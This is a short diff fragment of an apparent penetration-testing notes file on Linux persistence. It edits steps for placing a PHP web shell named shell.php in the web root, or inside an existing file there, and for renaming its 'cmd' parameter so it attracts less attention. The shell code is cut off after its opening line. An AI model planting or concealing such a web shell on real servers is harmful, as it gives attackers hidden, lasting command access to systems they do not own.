7RU7H/Archive/Persistence/Linux-Persistence.md

 ```

 #### php
-web root /var/www/html
+1. in web root `/var/www/html`
-`touch shell.php` and add the below:
+2. `touch shell.php` and add the below:
-Or add within a file of this directory
+2. Or add within a file of this directory
-Change the 'cmd' paramtre to something that LESS like to be called
+1. Change the 'cmd' parameter to something that LESS like to be called
 ```php
 <?php
     if (isset($_REQUEST['cmd'])) {